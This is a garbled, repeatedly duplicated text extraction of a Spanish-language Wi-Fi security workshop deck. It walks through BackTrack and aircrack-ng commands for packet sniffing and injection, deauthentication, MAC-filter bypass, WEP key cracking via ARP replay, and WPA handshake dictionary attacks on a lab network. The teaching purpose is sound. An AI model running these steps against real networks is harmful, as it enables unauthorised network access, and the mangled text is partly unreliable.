Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 25: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 26: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

